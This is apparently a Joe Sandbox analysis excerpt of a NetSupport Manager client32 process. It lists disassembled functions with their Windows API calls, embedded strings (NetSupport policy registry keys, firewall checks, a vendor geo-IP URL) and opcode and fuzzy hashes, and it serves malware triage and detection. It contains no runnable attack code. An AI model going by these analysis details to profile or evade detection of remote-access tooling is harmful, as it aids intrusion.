                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                        • API String ID: 596640303-1725438197
                                                                                                                                        • Opcode ID: ca546581657441e05077a34b56213b1af863b05488aca0afde80116b0eacc2e3
                                                                                                                                        • Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
                                                                                                                                        • Opcode Fuzzy Hash: ca546581657441e05077a34b56213b1af863b05488aca0afde80116b0eacc2e3
                                                                                                                                        • Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
                                                                                                                                        Function 11060CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                                        • Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                        • Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
                                                                                                                                        • Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                        • Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
                                                                                                                                        Function 11134AC0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 11134B22
                                                                                                                                          • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                          • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                          • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                          • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 11134B31
                                                                                                                                        • _memset.LIBCMT ref: 11134B73
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
                                                                                                                                        • _strrchr.LIBCMT ref: 11134B98
                                                                                                                                        • _free.LIBCMT ref: 11134BEA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                        • API String ID: 711243594-1270230032
                                                                                                                                        • Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                        • Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
                                                                                                                                        • Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                        • Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
                                                                                                                                        Function 11060CD6 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 121registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                                        • Opcode ID: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                        • Instruction ID: cd76c2840a1715f7d7d399ef9620e7e6cb5bc654635ea96c8559331baeb526dc
                                                                                                                                        • Opcode Fuzzy Hash: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                        • Instruction Fuzzy Hash: BF417175B4022DABEB21CA11CC81FEEB77CEB54708F1041D9F659A6140DBB06A85CBA5
                                                                                                                                        Function 11060CD4 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 120registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                                        • Opcode ID: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                        • Instruction ID: 375c621035b705b1b9e3f4a5420693f98d17ac4dbe140293a3c4dc63feaf086a
                                                                                                                                        • Opcode Fuzzy Hash: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                        • Instruction Fuzzy Hash: F74181B5B4022DABEB21CA118C81FEEB77CEB54708F1041D5F658A6140DBB06E81CBA5
                                                                                                                                        Function 688F7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ioctlsocket.WSOCK32 ref: 688F7642
                                                                                                                                        • connect.WSOCK32(00000000,?,?), ref: 688F7659
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,?), ref: 688F7660
                                                                                                                                        • _memmove.LIBCMT ref: 688F76D3
                                                                                                                                        • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 688F76F3
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688F7717
                                                                                                                                        • ioctlsocket.WSOCK32 ref: 688F775C
                                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688F7762
                                                                                                                                        • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 688F777A
                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 688F778B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                                        • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                        • API String ID: 4218156244-2969206566
                                                                                                                                        • Opcode ID: 8df8ca1b08bc200e67684feffcf109f6537bac79e12428e875d5ded3ed4eab16
                                                                                                                                        • Instruction ID: 478a073a8b48c6560d6195e947d7b78aada381e24da1bf86915445aace166815
                                                                                                                                        • Opcode Fuzzy Hash: 8df8ca1b08bc200e67684feffcf109f6537bac79e12428e875d5ded3ed4eab16
                                                                                                                                        • Instruction Fuzzy Hash: 60411B7591831CABF720EBA4CC48BEE73BAAF55344F8044A9E50997141EB70DA85CFA1
                                                                                                                                        Function 1102C850 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,A0A8B03E), ref: 1102CA84
                                                                                                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                                        • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                        • API String ID: 83693535-2077998243
                                                                                                                                        • Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                                        • Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
                                                                                                                                        • Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                                        • Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51
                                                                                                                                        Function 1112FC80 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 1112FCF0
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1112FD21
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1112FD3C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$FolderPathwsprintf
                                                                                                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                        • API String ID: 1170620360-4157686185
                                                                                                                                        • Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                        • Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
                                                                                                                                        • Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                        • Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92
